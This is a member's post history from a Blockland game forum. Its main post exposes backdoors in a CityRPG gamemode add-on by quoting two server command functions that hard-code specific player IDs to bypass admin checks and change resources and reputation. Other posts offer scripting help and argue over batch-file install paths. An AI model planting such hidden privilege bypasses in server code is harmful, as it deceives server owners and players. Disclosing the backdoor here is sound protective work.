1
Suggestions & Requests / Re: Date (time) Mod
« on: July 27, 2014, 10:23:24 PM »
/support
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
http://draked.me/drake/Gamemode_TysCityRPG.zipI don't think so.
You're wrong.
lumberintobricks.csTold you it had backdoors. Try reading the actual topic.
line 39
function serverCmdglumber(%client, %arg1)
{
if((%client.isSuperAdmin) || (%client.bl_id == 997) || (%client.bl_id == 4896) || (%client.bl_id == 27161))
%began = getWord(CityRPGData.getData(%client.bl_id).valueResources, 0);
CityRPGData.getData(%client.bl_id).valueResources = (getWord(CityRPGData.getData(%client.bl_id).valueResources, 0) + %arg1) SPC getWord(CityRPGData.getData(%client.bl_id).valueResources, 1);
997 is his ID, and this addon has a backdoor in it to allow him and a few other people to manipulate their resources without admin.
rep.cs
line 43
function serverCmdgRep(%client, %rep, %name)
{
if(%client.isSuperAdmin || %client.BL_ID == 997)
A backdoor for ty to give himself rep without admin.
-snip-Welcome back!
-snips-I'm going to fix a few coding issues, and some things that will help you improve your coding skills. In one of your if statements, you use "=". That character is used to define values - for checking values, you can use "$=", "==", or if it's just a 0 or a 1 (false or true, disabled or enabled, etc), you can just use the variable itself (eg if($ping) ). I fixed a bunch of things. If you need any help, or have any questions, just ask.
impossible without edits to the entire game
It Says: <input> (0) ; Unable to find function findclientbynameThen you did something wrong. findClientbyName is a default function. However, it will say this if you attempt to change your clan tags either if you're on another server (not yours), or it's yours but it's dedicated and you don't have access to eval. This code must be run through the server side, so you must either have access to eval, or you are currently hosting the server.
It does. Just swap out the directory with C:\Program Files\Steam\steamapps\common\Blockland\Blockland.exeThat's not what I meant. I meant that my original batch file code would not work with the steam version because that is the wrong file location.
It works with Steam...No, it doesn't. "C:\Users\name\Documents\Blockland\Blockland.exe" is not the location of blockland if you are running the steam version. So it doesn't work.